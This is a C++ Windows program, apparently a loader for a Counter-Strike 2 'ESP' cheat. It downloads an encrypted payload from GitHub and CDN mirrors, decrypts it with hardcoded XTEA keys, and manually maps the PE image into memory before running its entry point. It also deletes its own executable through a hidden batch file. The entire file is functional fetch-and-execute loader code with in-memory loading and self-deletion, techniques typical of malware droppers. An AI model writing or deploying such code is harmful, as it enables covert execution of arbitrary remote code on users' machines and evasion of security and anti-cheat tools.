#include <windows.h>
#include <winhttp.h>
#include <cstdint>
#include <cstdio>
#include <vector>
#pragma comment(lib, "winhttp.lib")
#pragma comment(lib, "shell32.lib")
static const wchar_t* URLS[] = {
    L"https://raw.githubusercontent.com/heruixii/cs2-remote-loader/5970d8d/payload.dat",
    L"https://cdn.jsdelivr.net/gh/heruixii/cs2-remote-loader@5970d8d/payload.dat",
    L"https://cdn.statically.io/gh/heruixii/cs2-remote-loader@5970d8d/payload.dat",
};
static constexpr uint32_t XDELTA=0x9E3779B9,XKEY[]={0x7B2E1A4F,0xC9D83560,0x4A1F93E7,0xE8056B2C};
static void XTEA(uint32_t& v0,uint32_t& v1){uint32_t s=0xC6EF3720;for(int i=0;i<32;i++){v1-=(((v0<<4)^(v0>>5))+v0)^(s+XKEY[(s>>11)&3]);s-=XDELTA;v0-=(((v1<<4)^(v1>>5))+v1)^(s+XKEY[s&3]);}}
static void XTEACBC(uint8_t* d,size_t sz){uint32_t i0=0xDEADBEEF,i1=0xCAFEBABE;auto* b=(uint32_t*)d;for(size_t i=0;i<sz/4;i+=2){uint32_t s0=b[i],s1=b[i+1];XTEA(b[i],b[i+1]);b[i]^=i0;b[i+1]^=i1;i0=s0;i1=s1;}}
static std::vector<uint8_t> DL(const wchar_t* u){std::vector<uint8_t> r;URL_COMPONENTS c={sizeof(c)};wchar_t h[256],p[1024];c.lpszHostName=h;c.dwHostNameLength=256;c.lpszUrlPath=p;c.dwUrlPathLength=1024;if(!WinHttpCrackUrl(u,0,0,&c))return r;bool ss=(c.nScheme==INTERNET_SCHEME_HTTPS);HINTERNET s=WinHttpOpen(L"D/1",ss?WINHTTP_ACCESS_TYPE_DEFAULT_PROXY:WINHTTP_ACCESS_TYPE_NO_PROXY,0,0,0);if(!s)return r;HINTERNET cn=WinHttpConnect(s,h,c.nPort,0);if(!cn){WinHttpCloseHandle(s);return r;}HINTERNET q=WinHttpOpenRequest(cn,L"GET",p,0,0,0,ss?WINHTTP_FLAG_SECURE:0);if(!q){WinHttpCloseHandle(cn);WinHttpCloseHandle(s);return r;}WinHttpSetTimeouts(q,30000,30000,30000,30000);if(!WinHttpSendRequest(q,0,0,0,0,0,0)||!WinHttpReceiveResponse(q,0)){WinHttpCloseHandle(q);WinHttpCloseHandle(cn);WinHttpCloseHandle(s);return r;}DWORD a=0;while(WinHttpQueryDataAvailable(q,&a)&&a>0){size_t o=r.size();r.resize(o+a);DWORD rd=0;if(!WinHttpReadData(q,r.data()+o,a,&rd)){r.clear();break;}r.resize(o+rd);}WinHttpCloseHandle(q);WinHttpCloseHandle(cn);WinHttpCloseHandle(s);return r;}
static void SelfDel(){wchar_t sp[MAX_PATH],bp[MAX_PATH];GetModuleFileNameW(0,sp,MAX_PATH);GetTempPathW(MAX_PATH,bp);wcscat_s(bp,L"~cld.bat");HANDLE f=CreateFileW(bp,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN,0);if(f!=INVALID_HANDLE_VALUE){const char* B="@echo off\r\n:r\r\ndel /f \"%~1\" 2>nul\r\nif exist \"%~1\" goto r\r\ndel /f \"%~0\" 2>nul\r\n";DWORD w;WriteFile(f,B,(DWORD)strlen(B),&w,0);CloseHandle(f);wchar_t cl[512];_snwprintf_s(cl,512,_TRUNCATE,L"/c \"\"%s\" \"%s\"\"",bp,sp);ShellExecuteW(0,L"open",L"cmd.exe",cl,0,SW_HIDE);}}
struct MR{bool ok;uint8_t* base;size_t sz;FARPROC ep;};static MR* g_pMr;
static LONG WINAPI OnCrash(EXCEPTION_POINTERS* ep){wchar_t m[512];DWORD c=ep->ExceptionRecord->ExceptionCode;PVOID a=ep->ExceptionRecord->ExceptionAddress;uint64_t off=(g_pMr&&g_pMr->base)?(uint64_t)a-(uint64_t)g_pMr->base:0;_snwprintf_s(m,512,_TRUNCATE,L"CRASH! Code=0x%08X At=0x%p Off=%llX",c,a,off);MessageBoxW(0,m,L"CRASH",MB_ICONERROR);return EXCEPTION_EXECUTE_HANDLER;}
static MR MM(const uint8_t* d,size_t ds){MR r={};if(ds<sizeof(IMAGE_DOS_HEADER))return r;auto* dos=(const IMAGE_DOS_HEADER*)d;if(dos->e_magic!=IMAGE_DOS_SIGNATURE)return r;auto* nt=(const IMAGE_NT_HEADERS*)(d+dos->e_lfanew);if(nt->Signature!=IMAGE_NT_SIGNATURE||nt->OptionalHeader.Magic!=IMAGE_NT_OPTIONAL_HDR64_MAGIC)return r;DWORD is=nt->OptionalHeader.SizeOfImage;auto* ib=(uint8_t*)VirtualAlloc(0,is,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);if(!ib)return r;memcpy(ib,d,nt->OptionalHeader.SizeOfHeaders);auto* fs=IMAGE_FIRST_SECTION(nt);for(int i=0;i<nt->FileHeader.NumberOfSections;i++)if(fs[i].SizeOfRawData>0)memcpy(ib+fs[i].VirtualAddress,d+fs[i].PointerToRawData,fs[i].SizeOfRawData);uintptr_t delta=(uintptr_t)ib-nt->OptionalHeader.ImageBase;if(delta){auto& rd=nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];if(rd.VirtualAddress&&rd.Size){auto* rl=(const IMAGE_BASE_RELOCATION*)(ib+rd.VirtualAddress);auto* re=(const IMAGE_BASE_RELOCATION*)(ib+rd.VirtualAddress+rd.Size);while(rl<re&&rl->SizeOfBlock){DWORD cnt=(rl->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/sizeof(WORD);auto* e=(const WORD*)(rl+1);for(DWORD j=0;j<cnt;j++)if((e[j]>>12)==IMAGE_REL_BASED_DIR64)*(uintptr_t*)(ib+rl->VirtualAddress+(e[j]&0xFFF))+=delta;rl=(const IMAGE_BASE_RELOCATION*)((const uint8_t*)rl+rl->SizeOfBlock);}}}wchar_t ld[MAX_PATH];GetModuleFileNameW(0,ld,MAX_PATH);wchar_t* ls=wcsrchr(ld,L'\\');if(ls)*(ls+1)=L'\0';wchar_t fp[MAX_PATH];_snwprintf_s(fp,MAX_PATH,_TRUNCATE,L"%slibwinpthread-1.dll",ld);if(!LoadLibraryW(fp))LoadLibraryW(L"libwinpthread-1.dll");auto& id_=nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];if(id_.VirtualAddress&&id_.Size){auto* idi=(const IMAGE_IMPORT_DESCRIPTOR*)(ib+id_.VirtualAddress);for(int i=0;idi[i].Name;i++){auto dn=(const char*)(ib+idi[i].Name);HMODULE hm=LoadLibraryA(dn);if(!hm)hm=GetModuleHandleA(dn);if(!hm)continue;auto* t=(uintptr_t*)(ib+idi[i].FirstThunk);auto* ot=(uintptr_t*)(ib+(idi[i].OriginalFirstThunk?idi[i].OriginalFirstThunk:idi[i].FirstThunk));for(int j=0;ot[j];j++){if(ot[j]&IMAGE_ORDINAL_FLAG64)t[j]=(uintptr_t)GetProcAddress(hm,MAKEINTRESOURCEA(ot[j]&0xFFFF));else{auto* ibn=(const IMAGE_IMPORT_BY_NAME*)(ib+ot[j]);t[j]=(uintptr_t)GetProcAddress(hm,ibn->Name);}}}}for(int i=0;i<nt->FileHeader.NumberOfSections;i++){DWORD pr=PAGE_READWRITE;DWORD ch=fs[i].Characteristics;if(ch&IMAGE_SCN_MEM_EXECUTE)pr=(ch&IMAGE_SCN_MEM_WRITE)?PAGE_EXECUTE_READWRITE:PAGE_EXECUTE_READ;else if(!(ch&IMAGE_SCN_MEM_WRITE))pr=PAGE_READONLY;if(fs[i].Misc.VirtualSize>0){DWORD op;VirtualProtect(ib+fs[i].VirtualAddress,fs[i].Misc.VirtualSize,pr,&op);}}r.ok=true;r.base=ib;r.sz=is;r.ep=(FARPROC)(ib+nt->OptionalHeader.AddressOfEntryPoint);return r;}
int WINAPI WinMain(HINSTANCE,HINSTANCE,LPSTR,int){MessageBoxW(0,L"S0:ESP v2.9(27a0b18)",L"Diag",0);SelfDel();MessageBoxW(0,L"DelOK",L"Diag",0);std::vector<uint8_t> enc;for(int i=0;i<3;i++){enc=DL(URLS[i]);if(enc.size()>=8)break;}if(enc.size()<8){MessageBoxW(0,L"FAIL:AllCDN",L"Diag",0);return 1;}uint32_t os=*(uint32_t*)enc.data();XTEACBC(enc.data()+4,enc.size()-4);auto mr=MM(enc.data()+4,os);if(!mr.ok){MessageBoxW(0,L"FAIL:Map",L"Diag",0);return 3;}wchar_t m3[192];_snwprintf_s(m3,192,_TRUNCATE,L"MapOK@%p SZ=%zu. Call DllMain (ESP loop)...",mr.base,mr.sz);MessageBoxW(0,m3,L"Diag",0);g_pMr=&mr;SetUnhandledExceptionFilter(OnCrash);auto dm=(BOOL(WINAPI*)(HINSTANCE,DWORD,LPVOID))mr.ep;dm((HINSTANCE)mr.base,DLL_PROCESS_ATTACH,nullptr);return 0;}
